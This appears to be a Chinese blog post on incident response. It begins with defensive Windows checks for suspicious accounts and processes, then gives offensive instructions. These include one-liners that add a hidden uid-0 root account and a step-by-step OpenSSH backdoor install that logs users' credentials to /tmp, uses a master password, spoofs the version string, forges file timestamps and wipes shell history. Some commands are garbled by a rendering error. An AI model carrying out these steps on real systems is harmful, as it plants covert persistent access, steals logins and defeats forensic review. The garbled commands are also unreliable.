应急响应排查思路

1.应急响应概念：
通常是指一个组织为了应对各种意外事件的发生所做的准备以及在事件发生后所采取的措施。

应急响应基本流程：

1. 总体来说：
   表现—>收集—>攻击—>追查—>修复：
   表现：（发现异常）
   1. 网站部分：篡改、丢失乱码
   2. 文件部分：丢失、篡改、泄露
   3. 系统部分：系统卡顿、CPU爆满、服务宕机
   4. 流量部分：大量数据包、陌生外部连接、网速网络卡顿
   5. 第三方服务部分：服务异常、运行异常
   收集：（收集信息）
   1. 操作系统：linux、windows、mac
   2. 具体收集内容：对外服务、开放端口、系统版本、网络环境、漏洞情况、软件平台、口令整理、有无防护
   攻击：（模拟攻击）
   1. web攻击：漏洞攻击、结合攻击、流量攻击
   2. 第三方攻击：数据库、远程网站、服务平台
   3. 操作系统攻击：权限提升、内网渗透、远程漏洞
   追查：
   日志分析、后门分析、流量分析、脚本软件分析、模拟渗透分析
   修复：
   根据攻击手段，进行相应的修复
2. 实际工作中的具体流程（五阶段）
   保护阶段，分析阶段，复现阶段，修复阶段，建议阶段
   目的：分析出攻击时间，攻击操作，攻击后果，安全修复等并给出合理解决方案。

**

3.window应急响应入侵排查思路

**
1.1 检查系统账号安全
1、查看服务器是否有弱口令，远程管理端口是否对公网开放。
检查方法：据实际情况咨询相关服务器管理员。
2、查看服务器是否存在可疑账号、新增账号。
检查方法：打开 cmd 窗口，输入lusrmgr.msc命令，查看是否有新增/可疑的账号，如有管理员群组的（Administrators）里的新增账户，如有，请立即禁用或删除掉。
3、查看服务器是否存在隐藏账号、克隆账号。
检查方法：
a、打开注册表 ，查看管理员对应键值。
b、使用D盾_web查杀工具，集成了对克隆账号检测的功能。
4、结合日志，查看管理员登录时间、用户名是否存在异常。
检查方法：
a、Win+R打开运行，输入“eventvwr.msc”，回车运行，打开“事件查看器”。
b、导出Windows日志–安全，利用Log Parser进行分析。

1.2 检查异常端口、进程

1、检查端口连接情况，是否有远程连接、可疑连接。
检查方法：
a、netstat -ano 查看目前的网络连接，定位可疑的ESTABLISHED
b、根据netstat 定位出的pid，再通过tasklist命令进行进程定位 tasklist | findstr “PID”
2、进程
检查方法：
a、开始–运行–输入msinfo32，依次点击“软件环境→正在运行任务”就可以查看到进程的详细信息，比如进程路径、进程ID、文件创建日期、启动时间等。
b、打开D盾_web查杀工具，进程查看，关注没有签名信息的进程。
c、通过微软官方提供的 Process Explorer 等工具进行排查 。
d、查看可疑的进程及其子进程。可以通过观察以下内容：
没有签名验证信息的进程
没有描述信息的进程
进程的属主
进程的路径是否合法
CPU或内存资源占用长时间过高的进程

3、一句话添加用户和密码

添加普通用户：

# 创建一个用户名guest，密码123456的普通用户useradd -p `openssl passwd -1 -salt 'salt' 123456` guest
# useradd -p 方法  ` ` 是用来存放可执行的系统命令,"$()"也可以存放命令执行语句useradd -p "$(openssl passwd -1 123456)" guest
# chpasswd方法useradd guest;echo 'guest:123456'|chpasswd
# echo -e方法useradd test;echo -e "123456\n123456\n" |passwd test

添加root用户：

# 创建一个用户名guest，密码123456的root用户useradd -p openssl passwd -1 -salt 'salt' 123456 guest -o -u 0 -g root -G root -s /bin/bash -d /home/test

可疑用户排查技巧：

查询特权用户特权用户(uid 为0)[root@localhost ~]# awk -F: ‘$3==0{print $1}’ /etc/passwd# 查询可以远程登录的帐号信息[root@localhost ~]# awk '/$1|$6/{print KaTeX parse error: Expected 'EOF', got '}' at position 2: 1}̲' /etc/shadow# …" | grep “ALL=(ALL)”

4.ssh公私钥免密登录

在客户端上生成一对公私钥，然后把公钥放到服务器上（~/.ssh/authorized_keys），保留私钥。当ssh登录时，ssh程序会发送私钥去和服务器上的公钥做匹配。如果匹配成功就可以登录了。

客户端：
ssh-keygen -t rsa
过程中按三次回车，执行结束如下图:

进入/root/.ssh/文件夹，查看文件夹的内容，如下所示：

其中 id_rsa为私钥，id_rsa.pub为公钥，接下来打开id_rsa.pub，将内容复制到服务器。将id_rsa.pub的内容追加到/root/.ssh/authorized_keys内，配置完成。

5.openssh后门

利用openssh后门，设置SSH后门密码及root密码记录位置，隐蔽性较强，不易被发现。

a、备份SSH配置文件mv /etc/ssh/ssh_config /etc/ssh/ssh_config.oldmv /etc/ssh/sshd_config /etc/ssh/sshd_config.old
b、解压并安装补丁tar zxf openssh-5.9p1.tar.gztar zxf openssh-5.9p1.tar.gzcp openssh-5.9p1.patch/sshbd5.9p1.diff  /openssh-5.9p1cd openssh-5.9p1patch < sshbd5.9p1.diff
c、记录用户名和密码的文件位置及其密码vi  includes.h    #define ILOG "/tmp/1.txt"             //记录登录本机的用户名和密码    #define OLOG "/tmp/2.txt"             //记录本机登录远程的用户名和密码    #define SECRETPW "123456789"          //后门的密码
d、修改版本信息vi version.h    #define SSH_VERSION "填入之前记下来的版本号,伪装原版本"    #define SSH_PORTABLE "小版本号"
e、安装并编译./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5make cleanmake && make installservice sshd restart
f、对比原来的配置文件，使配置文件一致，然后修改文件日期。
touch -r  /etc/ssh/ssh_config.old /etc/ssh/ssh_configtouch -r  /etc/ssh/sshd_config.old /etc/ssh/sshd_config
g、清除操作记录export HISTFILE=/dev/nullexport HISTSIZE=0echo >/root/.bash_history //清空操作日志